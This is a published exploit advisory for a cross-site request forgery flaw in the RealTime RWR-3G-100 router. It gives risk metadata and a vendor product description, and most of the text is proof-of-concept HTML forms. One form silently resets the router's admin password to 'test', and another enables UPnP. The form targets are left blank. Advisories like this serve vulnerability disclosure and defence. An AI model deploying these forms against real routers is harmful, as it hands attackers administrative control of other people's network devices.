RealTime RWR-3G-100 Router Cross-Site Request Forgery

Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

<!--
# Exploit Title: RealTime RWR-3G-100 Router Cross-Site Request Forgery (Change Admin Password)
# Date: 13 Aug, 2017
# Vendor Homepage :
# Vendor Contact :
# Firmware Version : Ver1.0.56
# Exploit Author: Touhid M.Shaikh
# Contact:
# Website:

===================
Product Description
===================

Provides Wireless/ Wired Broadband connectivity to SOHO & SME.
Provides Broadband connectivity to multiple users on the move.
Uses 3G/2.75G USB Dongle to get connected to Broadband/ Optionally Uses Wired Broadband connectivity.
Supports HSPA, EVDO, UMTS, HSDPA & HSUPA USB Dongles and Compatible with Blackberry & iPhone.
Creates 802.11n Wi-Fi Hotspot for Multiple Users to get connected to Broadband.
Small & Sleek Portable Router, Easy to Install & Manage.
-->

<!-- CHANGE ADMIN PASSWORD to test-->
<form action= method=POST name="password">
  <input type="text" name="username" value="admin">
  <input type="password" name="newpass" value="test">
  <input type="password" name="confpass" value="test">
  <input type="hidden" value="/status.asp" name="submit-url">
  <input type="submit" value="Apply Changes" name="save">
  <input type="reset" value=" Reset " name="reset" id="password Reset">
</form>
<!-- CHANGE ADMIN PASSWORD Ends here-->

<!---Enable The UPNP Service-->
<form action= method=POST name="upnpSetup">
  <input type="radio" name="upnpfunction" id="upnpfunctiony" value="yes" checked>
  <input type="radio" name="upnpfunction" id="upnpfunctionn" value="no" >
  <!--
  <input type="radio" name="avupnpfunction" id="avupnpfunctiony" value="yes" checked>
  <input type="radio" name="avupnpfunction" id="avupnpfunctionn" value="no" >
  -->
  <input type="submit" value="Apply Changes" name="save" id="upnp apply" >
  <input type="reset" value=" Reset " name="reset" id="upnp Reset">
  <input type="hidden" value="/upnp.asp" name="submit-url">
</form>
<!---Enable The UPNP Service Ends here-->

<!--
======GREEtZ=====
my cool Broo and Pratik K.tjani
-->

